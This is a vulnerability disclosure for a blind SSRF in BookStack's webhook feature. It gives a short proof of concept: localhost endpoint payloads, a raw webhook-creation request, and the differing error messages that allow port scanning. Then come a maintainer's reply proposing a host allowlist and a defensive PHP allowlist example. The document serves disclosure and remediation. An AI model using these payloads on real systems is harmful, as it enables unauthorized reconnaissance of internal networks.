Server Side Request Forgery (SSRF) in bookstackapp/bookstack
Reported on Jul 27th 2023
Description
The Webhook function can reach the local environment of the BookStack host.
Because the error message differs for open and closed ports, this blind SSRF makes it possible to port-scan the local environment.
Proof of Concept
After logging in, open the webhook settings page, create a webhook with an endpoint URL of the following form, and observe from the difference in the error messages that the local environment is reachable.
Payload
Open Port
http://localhost:80
Closed Port
http://localhost:1234
Request
POST /settings/webhooks/create HTTP/2
Host: demo.bookstackapp.com
...
_token=6AoIWKtSMXumoIqe2YyXsDREcraLVqwaIjf8VEV0&active=true&name=a&endpoint=http%3A%2F%2Flocalhost%3A1234%2F&timeout=20&events%5B%5D=all
Response Result (Error Message)
Open Port
Response status from endpoint was 405
Closed Port
cURL error 7: Failed to connect to localhost port 1234 after 0 ms: Connection refused (see https://curl.haxx.se/libcurl/c/libcurl-errors.html) for http://localhost:1234/
PoC Video
https://drive.google.com/file/d/1SM3HwCulnW_09L8FYo6V4wWc4tx95rYC/view?usp=drive_link
Impact
It is possible to port-scan the host's local environment.
Sensitive information from the local environment may also be obtained.
Thanks @scgajge12 for reporting. I updated the severity since this requires admin user access and user interaction to exploit.
I wouldn't want to reduce error messages or prevent local access in general, since the errors are meant to be actual and detailed, and there are legitimate local use-cases.
I'll probably instead add some level of SSR_HOST_ALLOWLIST option so a system admin can limit where all BookStack server-side-requests can be sent to.
This is pretty low-risk/low severity in my view so not something I'd rush a bug-fix for, but will more likely be something I target for the next feature releases (1-2 month release cycle).
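The allowlist the maintainer proposes, written out as an added PHP example that is not BookStack's own code: it parses an assumed comma-separated SSR_HOST_ALLOWLIST value and rejects webhook endpoints such as the report's http://localhost:1234/ before any request is made, which removes the open/closed-port signal shown in the PoC above.

```php
<?php
// Added example, not BookStack's own code: a host allowlist for outbound
// server-side requests, modelled on the SSR_HOST_ALLOWLIST option proposed
// above. The option name and comma-separated format are assumptions.
declare(strict_types=1);

// Parse "hooks.example.com,*.internal.example" into lowercase patterns.
// An empty list is treated as "allow everything" (assumed default).
function parseAllowlist(string $raw): array
{
    $entries = array_filter(array_map('trim', explode(',', $raw)), 'strlen');
    return array_values(array_map('strtolower', $entries));
}
// True if the endpoint may be requested: http(s) only, host present, and
// host matches an entry exactly or via a leading "*." wildcard. This
// matches the hostname only; it does not stop a permitted name from
// resolving to an internal address (resolve and check the IP if needed).
function isAllowedEndpoint(string $url, array $allowlist): bool
{
    if ($allowlist === []) {
        return true;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    $host = strtolower(rtrim($parts['host'], '.'));
    foreach ($allowlist as $pattern) {
        if ($pattern === $host) {
            return true;
        }
        if (str_starts_with($pattern, '*.')) {
            $suffix = substr($pattern, 1); // "*.example.com" -> ".example.com"
            if (strlen($host) > strlen($suffix) && str_ends_with($host, $suffix)) {
                return true;
            }
        }
    }
    return false;
}
// Constructed check: the report's PoC endpoints against an allowlist that
// only permits an external webhook receiver.
$allow = parseAllowlist('hooks.example.com,*.hooks.example.net');
foreach (['http://localhost:80', 'http://localhost:1234/', 'https://hooks.example.com/bookstack', 'https://eu.hooks.example.net/x'] as $url) {
    printf("%-40s %s\n", $url, isAllowedEndpoint($url, $allow) ? 'allowed' : 'blocked');
}
```

Because the check runs before the HTTP client is invoked, a blocked endpoint produces the same validation error regardless of whether the target port is open, so the detailed cURL errors the maintainer wants to keep no longer double as a port-scan oracle.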